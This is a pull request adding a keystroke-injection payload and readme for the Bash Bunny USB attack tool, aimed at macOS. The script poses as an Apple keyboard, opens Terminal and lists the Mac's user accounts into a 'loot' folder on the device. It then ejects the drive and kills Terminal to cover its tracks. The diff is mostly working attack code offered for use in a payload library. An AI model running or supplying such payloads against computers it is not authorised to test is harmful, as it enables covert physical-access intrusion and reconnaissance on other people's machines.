### PR TITLE
Added payload to list users available on the Mac

### DIFF
--- a/payloads/library/MacGetUsers/payload.txt
+++ b/payloads/library/MacGetUsers/payload.txt
@@ -1,0 +1,35 @@
+#!/bin/bash
+#
+# Title:         Mac Get Users
+# Author:        ericfri
+# Version:       1.0
+#
+# Lists the users available on the Mac
+# then stashes them in /loot/MacLoot/MacUsers/
+#
+# Amber..............Executing payload
+# Green..............Finished
+#
+
+LED G R
+ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
+
+lootdir=loot/MacLoot/MacUsers
+mkdir -p /root/udisk/$lootdir
+
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 2500
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING dscl . list /Users \| grep -v '_' \> /Volumes/BashBunny/$lootdir/data.txt\; diskutil eject /Volumes/BashBunny\; killall Terminal
+QUACK ENTER
+
+# Sync filesystem
+sync
+
+# Green LED for finished
+LED G

--- a/payloads/library/MacGetUsers/readme.md
+++ b/payloads/library/MacGetUsers/readme.md
@@ -1,0 +1,17 @@
+# Mac User Lister for the BashBunny
+
+* Author: ericfri
+* Version: Version 1.0
+* Target: OSX
+
+## Description
+
+A payload that lists the users on the system and creates a file inside a folder on the BashBunny called MacLoot/MacUsers.
+
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Amber              | Executing Payload                             |
+| Green              | Attack Finished                              |


### PR DESCRIPTION
Simple payload to list the users on a mac and store them into a file on the BashBunny